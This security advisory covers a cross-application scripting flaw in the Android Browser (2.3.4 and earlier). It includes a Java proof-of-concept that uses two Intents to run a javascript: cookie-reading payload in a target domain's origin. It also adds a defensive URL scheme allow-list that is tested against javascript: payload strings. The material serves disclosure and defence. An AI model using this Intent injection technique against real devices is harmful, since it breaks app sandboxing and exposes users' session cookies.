
Android Browser Cross-Application Scripting

Aleph Research Advisory

Identifier

Severity

High

Product

Android 2.3.4 and below

Mitigation

Install Android 2.3.5 or 3.2.

Technical Details

By generating a malicious Intent that targets Android's Browser, malware may exploit the Browser's URL loading process to inject JavaScript code into an arbitrary domain, thus breaking Android's sandboxing.

Proof-of-Concept

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
    // Target component: the stock Android Browser's main activity
    static final String mPackage = "com.android.browser";
    static final String mClass = "BrowserActivity";
    // Domain in whose origin the injected script ends up running
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    // Delay to let the first page finish loading before the javascript: URL is sent
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // First Intent: have the Browser load the target domain
        startBrowserActivity(mUrl);

        try {
            Thread.sleep(mSleep);
        }
        catch (InterruptedException e) {}
        // Second Intent: a javascript: URL, which the Browser executes in the
        // context of the page loaded above
        startBrowserActivity("javascript:" + mJavascript);
    }

    // Sends an explicit ACTION_VIEW Intent to the Browser activity with the given URL as data
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
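The root cause described above is that the Browser passed a URL received from an external Intent straight into its loading path, so a javascript: URL from another application ran in the origin of whatever page was already open. The following is an added example, not code from the advisory or from Aleph Research: a scheme allow-list that any app accepting external VIEW intents can apply before handing the URL to a WebView. The class and method names, and the policy that only http and https are loadable from an external Intent, are assumptions made here. It is written as plain Java so it compiles and runs with javac alone; in an Android activity the same check would be applied to getIntent().getDataString() before any loadUrl() call.

```java
import java.util.Locale;
import java.util.Set;

/**
 * Added example (not part of the Aleph Research advisory): validate a URL
 * received from another application before it reaches a WebView.
 */
public final class ExternalUrlFilter {

    // Assumed policy: externally supplied URLs may only be web URLs.
    // An allow-list fails closed for javascript:, data:, file: and any
    // scheme spelled in an unexpected way.
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    private ExternalUrlFilter() {}

    /**
     * Returns the scheme of the URL (the text before the first ':'), or
     * null if there is none. Follows the RFC 3986 rule that a scheme cannot
     * contain '/', '?' or '#', so "/path:x" has no scheme.
     */
    static String schemeOf(String url) {
        if (url == null) return null;
        for (int i = 0; i < url.length(); i++) {
            char c = url.charAt(i);
            if (c == ':') return i == 0 ? null : url.substring(0, i);
            if (c == '/' || c == '?' || c == '#') return null;
        }
        return null;
    }

    /**
     * True only when the URL carries an allow-listed scheme. A deny-list of
     * "javascript" would be fragile against case differences and against
     * leading whitespace that browsers strip, so the scheme is trimmed,
     * lower-cased and then compared against the allow-list.
     */
    public static boolean isLoadableFromExternalIntent(String url) {
        String scheme = schemeOf(url == null ? null : url.trim());
        if (scheme == null) return false;
        return ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT));
    }

    public static void main(String[] args) {
        // Constructed sample inputs, including the shape used by the PoC above.
        String[] samples = {
            "http://target.domain/",
            "https://example.org/path?q=1",
            "javascript:alert(document.cookie)",
            "JavaScript:alert(1)",
            "  javascript:alert(1)",
            "/relative/path",
            "data:text/html,<b>x</b>",
        };
        for (String s : samples) {
            System.out.printf("%-40s -> %s%n", s,
                    isLoadableFromExternalIntent(s) ? "load" : "reject");
        }
    }
}
```

Running the class prints "load" for the two web URLs and "reject" for everything else. The design point is the allow-list: the receiving activity decides which schemes it is willing to load on another application's behalf, rather than trying to enumerate the dangerous ones.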

Timeline

Credit

External References